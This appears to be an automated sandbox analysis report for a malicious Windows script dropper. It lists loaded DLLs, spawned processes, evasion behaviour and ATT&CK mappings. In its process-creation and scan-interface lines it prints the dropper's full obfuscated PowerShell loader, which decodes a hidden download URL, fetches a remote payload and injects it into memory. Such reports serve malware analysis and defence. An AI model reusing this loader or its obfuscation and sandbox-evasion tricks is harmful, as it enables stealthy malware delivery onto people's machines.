esmAllor.AfbinNScraneSpec.t Faun.AntipWKemikeBekl.bKyndeCem,lslMal xiMensteUndown S.rntM,tab ');Udslyngende (Fremtidsmuligheders ' asm$PeaseRCham oColoutDialeaViewitO
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Benzidine233.Sjl && echo $"
          Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
          Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll
          Source: C:\Windows\System32\PING.EXE Section loaded: winnsi.dll
          Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll
          Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll
          Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll
          Source: C:\Windows\System32\PING.EXE Section loaded: dnsapi.dll
          Source: C:\Windows\System32\PING.EXE Section loaded: rasadhlp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{06290BD0-48AA-11D2-8432-006008C3FBFC}\InprocServer32Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: Binary string: System.Management.Automation.pdb-2476756634-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 0000000A.00000002.4119942643.0000000008889000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Core.pdb source: powershell.exe, 0000000A.00000002.4119942643.0000000008889000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: stem.Core.pdb* source: powershell.exe, 0000000A.00000002.4119415851.0000000008820000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("POWERSHELL "$Srbrns = 1;$Headling='Substrin';$Headling+='g';Function Fremtidsmuligheders($Elmiernflatable){$Uddan", "0")
          Source: Yara match File source: 0000000A.00000002.4121086885.0000000009D38000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 0000000A.00000002.4098203498.0000000005EC7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 0000000A.00000002.4120919409.0000000008AF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000007.00000002.4185249372.000002449A046000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Forestries)$global:Zantewood = [System.Text.Encoding]::ASCII.GetString($Seniorstipendiats)$global:Gelatinizing192=$Zantewood.substring(295986,30428)<#Psychophobia Abdicable Clypeastr
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Curacaoerne $Ciphered $Pladsholderes), (Survigrous @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Eradiating = [AppDomain]::CurrentDomain.GetAssemblies()$
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Clasp)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Transformatorstationerne, $false).DefineType($Sybar
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Forestries)$global:Zantewood = [System.Text.Encoding]::ASCII.GetString($Seniorstipendiats)$global:Gelatinizing192=$Zantewood.substring(295986,30428)<#Psychophobia Abdicable Clypeastr
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Srbrns = 1;$Headling='Substrin';$Headling+='g';Function Fremtidsmuligheders($Elmiernflatable){$Uddannelsesafdelingerne=$Elmiernflatable.Length-$Srbrns;For($Elmier=5; $Elmier -lt $Uddannelsesafdelingerne; $Elmier+=(6)){$Undepreciative+=$Elmiernflatable.$Headling.Invoke($Elmier, $Srbrns);}$Undepreciative;}function Udslyngende($barm){& ($deforming) ($barm);}$Paviour=Fremtidsmuligheders ' ThemMBentjoTumulz couninonbilSo erl KonnaHelss/ Mus.5Maegl.Journ0Enlac Ci r(vesp,W MoriiPhthon AnoddKejs,oanal wDawttsEnkel EmascNSe,icT Reof Optim1Kanal0Nac o.Eviln0 Cohe;Biote restWAn,stiBagtandigam6 nse4Teleo;Exist Labox f,sk6 mas,4ukoll;Sinus Cinqur ,ntrvPtafi:Insta1H log2 Fals1 Dehu.D nsk0Photo)Konfo S,igmG KlbbeMiljicHjr,mkVievaomacro/.ring2 Rute0Tyngd1Iagtt0Twirl0Afste1Storm0Termo1Hors. SnrehFNucleiPopparYe,hoewifehfTaranoC.araxThy s/ar en1Abave2 orsi1Ikono.Dotti0Wordi ';$Presserendes=Fremtidsmuligheders ',pittUPrcissTimiaeCharmrSau.e- UtakAp ocrgItureealbifnCon,it avyt ';$Hustankes=Fremtidsmuligheders ' TephhRund tFootbtLim,sp Glyp:Respe/Regie/NegatoA.stir.ameliScurvgsammeiUngrinCheeraS,ruplFejlhcProlooDgnaanOsmogc riveFil,hpPe att Nyh,skonsoiT,iumnSuniocSmu t.Cerv.r nsinulo.us.CompucBacksoKogejmH.sge/ uswiaopsens .rked.ompltSpi e/ProjeKLevera DagsrSkraadCombiiImagon TritaBarsel SubgiForbitflocceFor.rtNeedee domiradver.OpsnupDebugfSkabeb saer ';$Agricolous=Fremtidsmuligheders '.onke>Sorts ';$deforming=Fremtidsmuligheders ',mpudiRevereGobsmxabbre ';$Befrogged = Fremtidsmuligheders 'Bas.geEtiolc PlanhParaloOlier flapp%Solsya.torip Catep D,owdSubc aBgerbtStrenaIng.n%Skiin\AsparBLikvieNebran Sta,zSengei AnthdTvangi.skarnT.lgaeSpids2Stro 3 econ3Ski d. 
GrosSCamoujC,terlProra Smok&Curta&Dipsa Afsjle Af uc ntomh kraoSalam Dephl$Frugt ';Udslyngende (Fremtidsmuligheders 'Panto$treergModiflCel,sokermab Kar a Bolil issa: kvalMFilmfa.niveu ilmer H,meeAric rAde onKodake Un,e= Folk(KraftcGilbemPerpedMadre lifto/ Mo ocPatho Kalkv$No,psBhappeeKanaefHalobr fnugoUnriggKlassgUn.areBygnid Fleu) Re i ');Udslyngende (Fremtidsmuligheders 'f.aar$ akshgEctoglRavinoOpr,jbangusaDe orlMaler:A mrkC.ltrahDrawaaDatelrM.rblmCo.che AarsuGrayfsNsk,beBeds rneighnNeuroe ApossIndda=U.kla$FredsHThumbuBombesPyromt P,rtaSprinnJounckBedeaeTilsysPalin.Dagmas.enoppHippalgr seiBefritJernb(Op,as$Sk,inACara.gDun erK,eolis ocucChiroo VililB.itooPi,peuOcells.ntar) Bu.c ');$Hustankes=$Charmeusernes[0];Udslyngende (Fremtidsmuligheders 'Scrof$UtopigNephrl Tan,oV.ndfb ,pomaBeakel.upli:TudbrR SelvoPyntetOverca NondtGuariiForsko Ann,n Da nsAll vp By nuBeatmmwholep B ggeZost,r.muldnDubioeContisLigul1Elect0Sto.e1 Jumi=Bar.kNBestoeSkinkw,aabe-Up.elOSkrmab Rij,j Intee PollcSpatut Cobw explaSPowdeyPres,sExcitt RosaeFo esmAllor.AfbinNScraneSpec.t Faun.AntipWKemikeBekl.bKyndeCem,lslMal xiMensteUndown S.rntM,tab ');Udslyngende (Fremtidsmuligheders ' asm$PeaseRCham oColoutDialeaViewitO
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Srbrns = 1;$Headling='Substrin';$Headling+='g';Function Fremtidsmuligheders($Elmiernflatable){$Uddannelsesafdelingerne=$Elmiernflatable.Length-$Srbrns;For($Elmier=5; $Elmier -lt $Uddannelsesafdelingerne; $Elmier+=(6)){$Undepreciative+=$Elmiernflatable.$Headling.Invoke($Elmier, $Srbrns);}$Undepreciative;}function Udslyngende($barm){& ($deforming) ($barm);}$Paviour=Fremtidsmuligheders ' ThemMBentjoTumulz couninonbilSo erl KonnaHelss/ Mus.5Maegl.Journ0Enlac Ci r(vesp,W MoriiPhthon AnoddKejs,oanal wDawttsEnkel EmascNSe,icT Reof Optim1Kanal0Nac o.Eviln0 Cohe;Biote restWAn,stiBagtandigam6 nse4Teleo;Exist Labox f,sk6 mas,4ukoll;Sinus Cinqur ,ntrvPtafi:Insta1H log2 Fals1 Dehu.D nsk0Photo)Konfo S,igmG KlbbeMiljicHjr,mkVievaomacro/.ring2 Rute0Tyngd1Iagtt0Twirl0Afste1Storm0Termo1Hors. SnrehFNucleiPopparYe,hoewifehfTaranoC.araxThy s/ar en1Abave2 orsi1Ikono.Dotti0Wordi ';$Presserendes=Fremtidsmuligheders ',pittUPrcissTimiaeCharmrSau.e- UtakAp ocrgItureealbifnCon,it avyt ';$Hustankes=Fremtidsmuligheders ' TephhRund tFootbtLim,sp Glyp:Respe/Regie/NegatoA.stir.ameliScurvgsammeiUngrinCheeraS,ruplFejlhcProlooDgnaanOsmogc riveFil,hpPe att Nyh,skonsoiT,iumnSuniocSmu t.Cerv.r nsinulo.us.CompucBacksoKogejmH.sge/ uswiaopsens .rked.ompltSpi e/ProjeKLevera DagsrSkraadCombiiImagon TritaBarsel SubgiForbitflocceFor.rtNeedee domiradver.OpsnupDebugfSkabeb saer ';$Agricolous=Fremtidsmuligheders '.onke>Sorts ';$deforming=Fremtidsmuligheders ',mpudiRevereGobsmxabbre ';$Befrogged = Fremtidsmuligheders 'Bas.geEtiolc PlanhParaloOlier flapp%Solsya.torip Catep D,owdSubc aBgerbtStrenaIng.n%Skiin\AsparBLikvieNebran Sta,zSengei AnthdTvangi.skarnT.lgaeSpids2Stro 3 econ3Ski d. 
GrosSCamoujC,terlProra Smok&Curta&Dipsa Afsjle Af uc ntomh kraoSalam Dephl$Frugt ';Udslyngende (Fremtidsmuligheders 'Panto$treergModiflCel,sokermab Kar a Bolil issa: kvalMFilmfa.niveu ilmer H,meeAric rAde onKodake Un,e= Folk(KraftcGilbemPerpedMadre lifto/ Mo ocPatho Kalkv$No,psBhappeeKanaefHalobr fnugoUnriggKlassgUn.areBygnid Fleu) Re i ');Udslyngende (Fremtidsmuligheders 'f.aar$ akshgEctoglRavinoOpr,jbangusaDe orlMaler:A mrkC.ltrahDrawaaDatelrM.rblmCo.che AarsuGrayfsNsk,beBeds rneighnNeuroe ApossIndda=U.kla$FredsHThumbuBombesPyromt P,rtaSprinnJounckBedeaeTilsysPalin.Dagmas.enoppHippalgr seiBefritJernb(Op,as$Sk,inACara.gDun erK,eolis ocucChiroo VililB.itooPi,peuOcells.ntar) Bu.c ');$Hustankes=$Charmeusernes[0];Udslyngende (Fremtidsmuligheders 'Scrof$UtopigNephrl Tan,oV.ndfb ,pomaBeakel.upli:TudbrR SelvoPyntetOverca NondtGuariiForsko Ann,n Da nsAll vp By nuBeatmmwholep B ggeZost,r.muldnDubioeContisLigul1Elect0Sto.e1 Jumi=Bar.kNBestoeSkinkw,aabe-Up.elOSkrmab Rij,j Intee PollcSpatut Cobw explaSPowdeyPres,sExcitt RosaeFo esmAllor.AfbinNScraneSpec.t Faun.AntipWKemikeBekl.bKyndeCem,lslMal xiMensteUndown S.rntM,tab ');Udslyngende (Fremtidsmuligheders ' asm$PeaseRCham oColoutDialeaViewitO
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9B965EA8 pushad ; retf 7_2_00007FFD9B965EA9
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_079A0AB8 push eax; mov dword ptr [esp], ecx 10_2_079A0AC4
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_079A08D8 push eax; mov dword ptr [esp], ecx 10_2_079A0AC4
          Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5192
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4715
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6942
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2723
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7884 Thread sleep time: -3689348814741908s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8032 Thread sleep count: 6942 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8020 Thread sleep count: 2723 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8064 Thread sleep time: -5534023222112862s >= -30000s
          Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
          Source: C:\Windows\System32\cmd.exe File Volume queried: C:\Windows\System32 FullSizeInformation
          Source: powershell.exe, 00000007.00000002.4220569806.00000244A2622000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
          Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\PING.EXE ping %.%.%.%
          Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dir
          Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Benzidine233.Sjl && echo $"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Benzidine233.Sjl && echo $"
          Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
          Resource Development: Scripting (22); Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
          Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
          Execution: Windows Management Instrumentation (1); Command and Scripting Interpreter (11); Exploitation for Client Execution (1); PowerShell (2); Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
          Persistence: Scripting (22); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
          Privilege Escalation: Process Injection (11); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
          Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (21); Process Injection (11); Obfuscated Files or Information (2); Software Packing (1); DLL Side-Loading (1); Compile After Delivery; Indicator Removal from Tools
          Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
          Discovery: Security Software Discovery (1); Process Discovery (1); Virtualization/Sandbox Evasion (21); Application Window Discovery (1); Remote System Discovery (1); System Network Configuration Discovery (1); File and Directory Discovery (1); System Information Discovery (14)
